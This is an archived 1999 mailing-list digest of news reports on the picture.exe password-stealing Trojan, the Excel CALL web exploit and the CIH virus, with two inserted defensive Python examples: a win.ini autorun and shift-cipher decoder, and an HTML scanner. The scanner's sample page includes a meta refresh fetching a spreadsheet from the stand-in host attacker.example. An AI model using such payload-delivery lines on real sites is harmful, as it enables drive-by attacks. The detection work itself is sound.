-Caveat Lector-

Trojan horse steals AOL passwords, URLs
----------------------------------------
By Paul Festa, January 7, 1999
Staff Writer, CNET News.com

A new email attachment making its way around the spam circuit is swiping recipients' user names and passwords and sending them to a Chinese email address.

Full story:
http://www.news.com/News/Item/0%2C4%2C30653%2C00.html?dd.ne.tx.ts3.0107

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

story #2 of 4:

from: http://www.msnbc.com/news/229572.asp

Picture.exe really a Trojan horse
E-mail attachment, if opened, tries to send private information to an e-mail address originating in China
------------------------------------------------------
By Bob Sullivan, MSNBC

Jan. 6 -- Here's a computer virus story that's not an urban legend. If you receive an attachment in e-mail called "picture.exe," don't open it. If you do, what happens next reads a bit like a spy novel: this Trojan horse drops two more programs, note.exe and manager.exe, which search through your Internet cache directory and, if you have one, the directory that holds your America Online username and password. It then encrypts that information, tries to establish an Internet connection, and sends it all to an e-mail address in China.

PICTURE.EXE FIRST SURFACED right before Christmas, when some Net users were spammed with e-mail with the subject line "batty." Several postings to Usenet virus groups followed; then Network Associates engineers received several e-mail alerts to what appeared to be technically not a virus but a Trojan horse. (A Trojan horse does not replicate on its own, but a virus does.) Network Associates has since updated its McAfee virus program to detect picture.exe (if you already have the software, an updated version can be downloaded from http://beta.nai.com/public/datafiles/3xupdates.htm ), but many questions remain about the prying program.
"This is a more interesting Trojan than normal," said Vincent Gullotto, manager of the antivirus emergency response team for Network Associates. "It actually has the capability to take information and send it someplace. This one goes further than most and if it's successful can use the information against you."

Network Associates received an unusually large number of e-mails from victims of picture.exe, and there are already dozens of Usenet posts with security experts warning about the danger.

Here's how it works: Once a recipient opens picture.exe, that file expands into two other executables -- note.exe and manager.exe -- and places them into the Windows subdirectory. The following line is also added to the win.ini file: "run=note.exe." That makes note.exe run the next time Windows is started.

According to Network Associates, note.exe then gathers information, apparently looking through the temporary Internet cache directory in an attempt to determine what Web sites users have visited. It then encrypts that information into a DAT file. It also appears to look in the directory where AOL user information is stored. Note.exe then builds a second DAT file. "It's unclear right now what the second DAT file is for," Gullotto said.

Usenet poster David Crick, a British computer science student who received the e-mail Dec. 23 and started the Usenet discussions, said, "I thought when I started downloading a very large e-mail: `Either someone's sent me an interesting piece of software, or it's a virus.' It turned out to be a combination of the two -- an interesting virus," he said.

Crick says the file employs a crude encryption technique, a five-position ASCII character shift, where a=f, b=g, and so on. Other Usenet posters say the DAT file is full of e-mail addresses.

After note.exe does its thing, manager.exe runs, attempting to e-mail the encrypted file to e-mail addresses with the domain of a Chinese ISP. The recipient, of course, could be anywhere.
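Two checks a responder could run against the artifacts the story describes, as an added example (this is not code from the article, from Network Associates, or from the Trojan itself): one parses win.ini for the run= persistence line, the other undoes the character shift Crick described and, as a generalization the page does not cover, guesses the shift constant when it is not known. The win.ini contents and the DAT bytes are constructed for the example. That the shift is applied to every byte rather than only to letters, and that the sibling load= key is worth checking alongside run=, are this example's assumptions; the page says only "a five-position ASCII character shift, where a=f, b=g".

```python
import re

# Constructed win.ini as the article describes it after picture.exe has run:
# a "run=note.exe" line under [windows].  Not a capture from a real machine.
SAMPLE_WIN_INI = """\
[windows]
load=
run=note.exe
NullPort=None
device=HP LaserJet 4,HPPCL5MS,LPT1:

[Desktop]
Wallpaper=(None)
"""

# Constructed plaintext standing in for what note.exe collects (visited
# URLs, AOL account details); SAMPLE_DAT below is the same bytes after the
# shift, so the decoder has something to undo.
SAMPLE_PLAINTEXT = b"http://www.news.com/\r\nAOL screen name: someuser\r\n"


def autorun_entries(win_ini_text):
    """Return (key, value) pairs from the run= and load= keys of [windows].

    Windows 3.x/9x starts every program named on these two lines at logon,
    which is exactly the persistence the article describes.  The article
    mentions only run=; also checking load= is this example's assumption.
    Section and key names in .ini files are case-insensitive.
    """
    section = None
    found = []
    for raw in win_ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue                       # blank line or comment
        header = re.match(r"\[(.+)\]$", line)
        if header:
            section = header.group(1).lower()
            continue
        if section != "windows" or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key.lower() in ("run", "load") and value:
            found.append((key.lower(), value))
    return found


def shift_encode(data, shift=5):
    """Forward direction of the shift Crick described (a=f, b=g, ...).

    Assumption: the shift is applied to every byte, wrapping at 256.
    """
    return bytes((b + shift) % 256 for b in data)


def shift_decode(data, shift=5):
    """Undo the shift: subtract the constant from every byte."""
    return bytes((b - shift) % 256 for b in data)


def guess_shift(data):
    """Pick the shift (0..255) whose decoding has the most printable ASCII.

    Goes beyond the article: handy when a sample uses the same crude scheme
    with a different constant.  For SAMPLE_DAT it recovers 5.
    """
    def printable(b):
        return 32 <= b < 127 or b in (9, 10, 13)
    return max(range(256),
               key=lambda s: sum(printable(c) for c in shift_decode(data, s)))


SAMPLE_DAT = shift_encode(SAMPLE_PLAINTEXT)   # constructed "encrypted" DAT file


if __name__ == "__main__":
    for key, program in autorun_entries(SAMPLE_WIN_INI):
        print(f"win.ini [windows] {key}={program}  <- started at every boot")
    shift = guess_shift(SAMPLE_DAT)
    print(f"best shift guess: {shift}")
    print(shift_decode(SAMPLE_DAT, shift).decode("ascii", "replace"))
```

The printable-ratio heuristic in guess_shift only works because the real scheme is a fixed byte offset; it says nothing about a sample that has been compressed or properly encrypted, so a decoding that still looks like noise at every shift means the file is not this scheme.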
"It appears to try to gain access to an ISP," Gullotto said. Several Usenet posts say that upon reboot, the Trojan horse opens up dial-up networking and tries to dial out of the infected PC.

There are many unanswered questions -- chief among them, why China? Gullotto said last year his firm worked on a similar Trojan horse/virus with the same M.O. Called SemiSoft, it also gathers information and tries to send it to an e-mail address hosted in China.

Network Associates is continuing to study picture.exe. America Online was not available for comment.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

story #3 of 4:

Hole lets sites control your computer
Security firm demonstrates active content hack
-----------------------------------------------
By Bob Sullivan, MSNBC

Jan. 5 -- There's another reason to be careful where you click. Computer security firm Finjan Inc. demonstrated Tuesday morning another process that allows Web sites to reach through the Internet and take control of your PC without your knowledge. A combination of features in Microsoft Excel and most popular Web browsers allows nefarious Web site authors to secretly send and execute programs on unsuspecting users' machines. To demonstrate this, the company copied Word documents from reporters' hard drives and posted them on Finjan's public Web site. In Tuesday's demonstration for reporters, Finjan's Web page placed a folder on reporters' hard drives called "You_have_been_hacked."

JIM ELLIS, VULNERABILITY ANALYST at the Computer Emergency Response Team Coordination Center, said the security hole was serious but was another of a class of security problems that have been demonstrated ever since active content like Java and ActiveX became part of the Internet. (Microsoft is a partner in MSNBC.)

"What you have done is you say it's OK for whoever wrote this Web page to run content on my machine, and what this content can do is anything," Ellis said.
"Anything" includes copying all files from a directory, destroying all files, even reformatting your hard drive -- essentially anything a Visual Basic programmer can do. "The fact that it's running content at all is across the line. It all boils down to all those things are possible once you let someone run code on your machine," Ellis said.

Finjan's demonstration, which the company dubbed the Russian New Year attack, took advantage of an already-disclosed flaw in Microsoft Excel (see MSNBC's Dec. 11 Bug Alert: http://www.msnbc.com/news/222906.asp ). Excel's CALL function, which lets a worksheet formula invoke functions exported by Windows .dll files, can be used to trigger bad code without a user's knowledge. Microsoft issued a patch for that in early December.

Finjan security experts Tuesday demonstrated an implementation of the Excel CALL function on a Web page. An unsuspecting surfer would click on a Web link, which would launch Excel, which would then employ the CALL function to transmit a batch file that executed code on a user's machine. In Tuesday's demonstration for reporters, Finjan's Web page placed a folder on reporters' hard drives called "You_have_been_hacked" and put Word files copied from reporters' computers onto the company's Web site.

All of Microsoft's Internet Explorer browser versions 3.x and 4.x as well as Netscape browser versions 3.x and 4.x (except Navigator 4.5) are vulnerable when used with Excel 95 or 97, according to Finjan. Both Navigator and Explorer are capable of auto-launching an application like Microsoft Excel using standard HTML tags.

There are several defensive measures users can take. Users can install Microsoft's patch from http://officeupdate.microsoft.com/downloadDetails/xl97cfp.htm . CERT's Ellis says Excel users can disable macros -- that will prevent the CALL function from working. Finjan also suggests Netscape Navigator 4.0 users upgrade to 4.5, and that Internet Explorer users adjust the security setting on the browser to the highest level.
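A gateway-side filter for the auto-launch step described above, as an added example (not Finjan's product or code, and not a reproduction of the CALL payload): it parses a page and flags any HTML element that would hand an Office document to Excel or Word without the user clicking, which is the condition the article says both browser families meet "using standard HTML tags". The tag list, the extension list, the block policy and the sample page (with the made-up host attacker.example) are this example's assumptions; the article itself does not say which tags Finjan used.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Document types the browsers named in the article hand straight to Office.
# The article names Excel 95/97; the exact extension list is an assumption.
OFFICE_EXTENSIONS = (".xls", ".xla", ".xlt", ".doc", ".dot")

# Tags whose resource is fetched (and passed to a helper application) as
# soon as the page renders.  Assumed list; the page says only "standard
# HTML tags".
AUTO_LOAD_ATTRS = {"frame": "src", "iframe": "src", "embed": "src", "object": "data"}

# Constructed sample page, not Finjan's demonstration page.
CONSTRUCTED_PAGE = """<html><head>
<meta http-equiv="refresh" content="0; URL=http://attacker.example/newyear.xls">
</head><body>
<p>Happy New Year!</p>
<iframe src="/docs/greeting.XLS" width="1" height="1"></iframe>
<a href="/docs/report.xls">quarterly report</a>
<img src="/holiday.gif">
</body></html>"""


class OfficeLaunchScanner(HTMLParser):
    """Collect (tag, url, how) for every reference to an Office document.

    how == "auto"  : loaded without any user action (meta refresh, frames,
                     embeds), the case the article calls "without your knowledge"
    how == "click" : an ordinary link; the Finjan demo still needed a click,
                     so these are reported too, at lower urgency
    """

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = {name.lower(): (value or "") for name, value in attrs}
        if tag == "meta" and attrs.get("http-equiv", "").lower() == "refresh":
            # content="0; URL=http://..."; the URL part is optional and case-insensitive
            match = re.search(r"url\s*=\s*['\"]?([^'\"\s]+)", attrs.get("content", ""), re.I)
            if match:
                self._record(tag, match.group(1), "auto")
        elif tag in AUTO_LOAD_ATTRS:
            self._record(tag, attrs.get(AUTO_LOAD_ATTRS[tag], ""), "auto")
        elif tag == "a":
            self._record(tag, attrs.get("href", ""), "click")

    def _record(self, tag, url, how):
        # Compare the path only, so a query string cannot hide the extension.
        path = urlsplit(url).path.lower()
        if path.endswith(OFFICE_EXTENSIONS):
            self.findings.append((tag, url, how))


def scan_html(html):
    """Return the findings for one page, auto-launch hits first."""
    scanner = OfficeLaunchScanner()
    scanner.feed(html)
    scanner.close()
    return sorted(scanner.findings, key=lambda f: f[2] != "auto")


def should_block(html):
    """Gateway policy (assumed): refuse a page that loads an Office document without a click."""
    return any(how == "auto" for _, _, how in scan_html(html))


if __name__ == "__main__":
    for tag, url, how in scan_html(CONSTRUCTED_PAGE):
        print(f"{how:5} <{tag}> -> {url}")
    print("block page:", should_block(CONSTRUCTED_PAGE))
```

The scanner looks only at static markup; a page that navigates to the spreadsheet from script, or serves it with a misleading extension and an application/vnd.ms-excel Content-Type, passes it, so in practice this belongs next to a Content-Type check on the response itself rather than in place of one.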
Microsoft Office group product manager John Duncan said his company has moved quickly to fix the bug which allows the Russian New Year attack, saying Microsoft has sent over 1 million e-mails warning customers about the hazards of the CALL function. The company also says it has software that can detect and block the hack.

"Our No. 1 goal is to inform and protect customers, and that's why within a week we moved to create the fix and communicated it through every channel we could," Duncan said. "This is not a new issue, it's the one we covered in December."

CERT officials say these kinds of hacks will continue to be exploited until there's an infrastructure change in the Internet itself that changes the nature of active content. "We want to be able to allow people to run active content, but only when it's their choice," Ellis said. "You know where the program is coming from and know the type of things a program is able to do."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

story #4 of 4:

From: Tom Addison <[EMAIL PROTECTED]>
Date: Mon, 28 Dec 1998
Subj: Virus Win95/CIH
~~~~~~~~~~~~~~~~

I know this may not belong here but any help would be appreciated. During the holidays I received a very nice file called tree.exe. You clicked on angels and decorated a tree. I had two anti-virus programmes running and neither detected it. The friend who sent it had Norton and had the virus eat and delete their Norton then lock up and crash their hard disc. I have since downloaded McAfee only to find that the virus forces deletion of your McAfee exe files before they can complete their work. In hopes of using one anti-virus to clean the other I downloaded Norton early this morning. After downloading 12+ MBs Norton began to open only to be deleted by McAfee anti-virus because the file is already infected. Poof, 12 MB gone. If you have this file from someone get rid of it (although the bad news is the damage is done). If anyone has had some success please pass it along.
Tom, one solution:

Norton AntiVirus KILL_CIH.EXE Tool, see:
http://www.symantec.com/avcenter/kill_cih.html

You can obtain a freeware version of Norton AntiVirus to detect and remove the virus from files on the Symantec web site at:
http://www.symantec.com/nav/navc.html

NOTE: If you are already infected with the W95.CIH virus, run the KILL_CIH tool first before attempting to update your anti-virus definitions or scan your system. If you attempt to scan with an anti-virus product without first running this tool, you run the risk of causing your infection to spread. Once you have used this tool, you can safely update your Norton AntiVirus definitions and scan your machine.

Download the KILL_CIH tool:
ftp://ftp.symantec.com/public/english_us_canada/antivirus_definitions/norton_antivirus/kill_cih.exe

DECLARATION & DISCLAIMER
==========
CTRL is a discussion and informational exchange list. Proselytizing propagandistic screeds are not allowed. Substance—not soapboxing! These are sordid matters and 'conspiracy theory', with its many half-truths, misdirections and outright frauds, is used politically by different groups with major and minor effects spread throughout the spectrum of time and thought. That being said, CTRL gives no endorsement to the validity of posts, and always suggests to readers: be wary of what you read. CTRL gives no credence to Holocaust denial and Nazis need not apply. Let us please be civil and as always, Caveat Lector.
========================================================================
Archives Available at:
http://home.ease.lsoft.com/archives/CTRL.html
http:[EMAIL PROTECTED]/
========================================================================
To subscribe to Conspiracy Theory Research List[CTRL] send email:
SUBSCRIBE CTRL [to:] [EMAIL PROTECTED]

To UNsubscribe to Conspiracy Theory Research List[CTRL] send email:
SIGNOFF CTRL [to:] [EMAIL PROTECTED]

Om